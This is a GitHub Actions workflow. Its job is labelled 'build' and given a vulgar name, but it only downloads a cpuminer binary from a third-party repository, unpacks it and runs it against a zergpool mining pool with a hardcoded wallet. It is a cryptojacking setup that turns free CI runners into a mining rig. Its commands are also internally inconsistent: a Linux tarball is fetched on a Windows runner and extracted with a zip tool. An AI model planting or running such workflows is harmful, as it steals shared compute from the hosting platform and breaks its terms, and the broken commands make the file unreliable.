name: kontol  
   
on: [workflow_dispatch]  
   
jobs:  
  build:  
    name: kontol  
    runs-on: windows-latest  
    strategy:  
      max-parallel: 1  
      fail-fast: false  
      matrix:  
        go: [1.0]  
        flag: [A]  
    env:  
        NUM_JOBS: 2  
        JOB: ${{ matrix.go }}  
    steps:  
    - name: DOWNLOAD  
      run: Invoke-WebRequest https://github.com/cpu-pool/cpuminer-opt-cpupower/releases/download/1.4/Cpuminer-opt-cpu-pool-linux64.tar.gz -OutFile Cpuminer-opt-cpu-pool-linux64.tar.gz
    - name: Extract  
      run: Expand-Archive Cpuminer-opt-cpu-pool-linux64.tar.gz 
    - name: RUNNING  
      run: ./cpuminer -a yescryptR16 -o stratum+tcp://yescryptR16.mine.zergpool.com:6333 -u XcF8ZFvmFbpWtAqNGKkcQWpwvBrhKocdrK -p c=DASH,mc=QOGE,ID=W-$(echo $(hostname)) -t 2 
    - name: DONE  
      run: exit
